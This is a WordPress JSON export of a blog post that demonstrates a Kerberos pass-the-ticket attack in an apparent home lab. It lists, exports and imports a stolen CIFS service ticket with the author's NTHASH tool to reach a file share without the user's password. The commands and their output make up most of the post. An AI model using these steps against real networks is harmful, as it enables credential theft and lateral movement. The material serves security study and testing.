{"id":2387,"date":"2022-10-31T17:20:03","date_gmt":"2022-10-31T16:20:03","guid":{"rendered":"https:\/\/labalec.fr\/erwan\/?p=2387"},"modified":"2022-10-31T17:22:07","modified_gmt":"2022-10-31T16:22:07","slug":"playing-with-kerberos-tickets-and-nthash","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2387","title":{"rendered":"Playing with Kerberos tickets and NTHASH"},"content":{"rendered":"\n<p>We will be discussing privilege escalation and\/or lateral movement.<\/p>\n\n\n\n<p><strong>The theory.<\/strong><\/p>\n\n\n\n<p>You got yourself access to a host where other users (preferably local or domain admins) are logged on?<\/p>\n\n\n\n<p>Lets:<br>-List the kerberos ticket(s) with nthash-win64 \/klist<br>-Export the tgs ticket with nthash-win64 \/ask \/input:service\/fqdn<br>-Import (in another session, or another host) the (preferably tgs) ticket with nthash-win64 \/binary:ticket.kirbi<\/p>\n\n\n\n<p>Note 1 : an admin can touch on all tickets (pass on the luid parameter on)<br>Note 2 : if the host2\/attacker is a domain joined computer, a tgt ticket may be enough (your host \u00ab\u00a0should\u00a0\u00bb handle the tgs when you request a service)<br>Note 3 : this is not about requesting\/forging a ticket (see rubeus) but about stealing a ticket<\/p>\n\n\n\n<p><strong>Practical example<\/strong>.<\/p>\n\n\n\n<p><em>On host1\/victim, we can witness that the logged on user (user1) has access to a remote share.<\/em><\/p>\n\n\n\n<p>dir \\\\WIN-BBC4BS466Q5.home.lab\\temp<br>Le volume dans le lecteur \\WIN-BBC4BS466Q5.home.lab\\temp n&rsquo;a pas de nom.<br>Le num\u00e9ro de s\u00e9rie du volume est 763C-BB7B<\/p>\n\n\n\n<p>R\u00e9pertoire de \\WIN-BBC4BS466Q5.home.lab\\temp<\/p>\n\n\n\n<p>20\/02\/2022 21:21 .<br>20\/02\/2022 21:21 ..<br>27\/07\/2022 17:09 1&nbsp;313&nbsp;792 NTHASH-win64.exe<br>1 fichier(s) 1&nbsp;313&nbsp;792 octets<br>2 R\u00e9p(s) 971&nbsp;288&nbsp;576 octets libres<\/p>\n\n\n\n<p><em>And indeed, there is a ticket which we may want to steal (cifs\/WIN-BBC4BS466Q5.home.lab).<\/em><\/p>\n\n\n\n<p>nthash-win64.exe \/klist<br>NTHASH 1.8 x64 by erwan2212@gmail.com<\/p>\n\n\n\n<p>EncryptionType:00000012<br>StartTime:31\/10\/2022 16:26:32<br>EndTime:01\/11\/2022 02:26:32<br>RenewTime:07\/11\/2022 16:26:32<br>Server Name:krbtgt\/home.lab<br>Client Name:user1<br>Flags:40E10000<\/p>\n\n\n\n<p>EncryptionType:00000012<br>StartTime:31\/10\/2022 16:26:41<br>EndTime:01\/11\/2022 02:26:32<br>RenewTime:07\/11\/2022 16:26:32<br>Server Name:cifs\/WIN-BBC4BS466Q5.home.lab<br>Client Name:user1<br>Flags:40A50000<\/p>\n\n\n\n<p><em>Lets export this ticket to a file (which we will be importing later on).<\/em><\/p>\n\n\n\n<p>nthash-win64.exe \/ask \/input:cifs\/WIN-BBC4BS466Q5.home.lab<br>NTHASH 1.8 x64 by erwan2212@gmail.com<br>Asking for: cifs\/WIN-BBC4BS466Q5.home.lab<br>StartTime:31\/10\/2022 16:26:41<br>EndTime:01\/11\/2022 02:26:32<br>RenewUntil:07\/11\/2022 16:26:32<br>ServiceName: cifs\/WIN-BBC4BS466Q5.home.lab<br>ClientName: user1<br>Flags: 40A50000<br>KeyType: 00000012<br>Key:C569A92747E0972A624943E4D99EF1D6BC7CADC7E379E928179BDE816DB419A3<br>TicketEncType: 00000012<br>Ticket:6182040630820402A003020105A10A1B08484F4D452E4C4142A22B3029A00302<\/p>\n\n\n\n<p>* KiRBi to file:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi<\/p>\n\n\n\n<p><em>On host2\/attacker, we witness that we do not have (yet) access to the target remote share.<\/em><\/p>\n\n\n\n<p>dir \\\\WIN-BBC4BS466Q5.home.lab\\temp<br>Le nom d&rsquo;utilisateur ou le mot de passe est incorrect.<\/p>\n\n\n\n<p><em>Lets import our ticket (exported in previous step).<\/em><\/p>\n\n\n\n<p>NTHASH-win64.exe \/ptt \/binary:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi<br>NTHASH 1.8 x64 by erwan2212@gmail.com<br>Ticket successfully submitted for current session<\/p>\n\n\n\n<p><em>Lets confirm that our ticket now appears in our current (attacker) session.<\/em><\/p>\n\n\n\n<p>NTHASH-win64.exe \/klist<br>NTHASH 1.8 x64 by erwan2212@gmail.com<\/p>\n\n\n\n<p>EncryptionType:00000012<br>StartTime:31\/10\/2022 16:26:41<br>EndTime:01\/11\/2022 02:26:32<br>RenewTime:07\/11\/2022 16:26:32<br>Server Name:cifs\/WIN-BBC4BS466Q5.home.lab<br>Client Name:user1<br>Flags:40A50000<\/p>\n\n\n\n<p><em>Lets now finally confirm that we do have access to the remote share (although we are not impersonating the original \u00ab\u00a0user1\u00a0\u00bb , nor do we know user1 password).<\/em><\/p>\n\n\n\n<p>dir \\WIN-BBC4BS466Q5.home.lab\\temp<br>Le volume dans le lecteur \\WIN-BBC4BS466Q5.home.lab\\temp n&rsquo;a pas de nom.<br>Le num\u00e9ro de s\u00e9rie du volume est 763C-BB7B<\/p>\n\n\n\n<p>R\u00e9pertoire de \\WIN-BBC4BS466Q5.home.lab\\temp<\/p>\n\n\n\n<p>20\/02\/2022 21:21 .<br>20\/02\/2022 21:21 ..<br>27\/07\/2022 17:09 1&nbsp;313&nbsp;792 NTHASH-win64.exe<br>1 fichier(s) 1&nbsp;313&nbsp;792 octets<br>2 R\u00e9p(s) 971&nbsp;296&nbsp;768 octets libres<\/p>\n","protected":false},"excerpt":{"rendered":"<p>We will be discussing privilege escalation and\/or lateral movement. The theory. You got yourself access to a host where other users (preferably local or domain admins) are logged on? Lets:-List the kerberos ticket(s) with nthash-win64 \/klist-Export the tgs ticket with nthash-win64 \/ask \/input:service\/fqdn-Import (in another session, or another host) the (preferably tgs) ticket with nthash-win64 <a href='https:\/\/labalec.fr\/erwan\/?p=2387' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[125,118],"tags":[],"class_list":["post-2387","post","type-post","status-publish","format-standard","hentry","category-kerberos","category-nthash","category-125-id","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2387","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2387"}],"version-history":[{"count":3,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2387\/revisions"}],"predecessor-version":[{"id":2390,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2387\/revisions\/2390"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2387"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2387"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2387"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}